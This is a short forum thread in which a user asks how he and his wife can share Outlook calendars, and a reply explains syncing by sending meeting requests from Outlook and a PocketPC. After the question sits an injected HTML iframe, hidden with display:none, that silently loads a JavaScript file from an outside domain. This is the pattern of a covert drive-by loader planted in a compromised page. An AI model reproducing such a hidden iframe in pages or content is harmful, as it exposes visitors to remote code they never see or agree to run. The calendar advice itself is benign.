+ Reply to Thread

Thread: Sharing Outlook

Sharing Outlook

How can my wife and I share our Outlook calenders? We are both quite busy these days and it would be nice to be able to sync our calenders so we don't have to do it one message at a time by hand.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

sync calendars via outlook meeting requests

i dont know how you could sync a whole calendar with another user, but my wife and i add events to each other's calendars by sending each other a meeting request in Outlook via email.

when you're creating a new appt in Outlook on the PC, click on the Attendee Availability tab in the new event, and enter your wife's email address in the list of attendees. when she next checks her email she'll get an invite to the appt, which she can accept, and that'll get added to her PocketPC Calendar next time she syncs.

When adding a new event on the PocketPC, the Attendees field is below the Categories field, and so is usually hidden by the keyboard/text entry window. Minimise that by clicking on the keyboard icon at bottom-right, and you'll see the Attendees field. Enter your wife's name there, and next time you sync, it'll send her an invite via email as per above.
    www.doingwords.com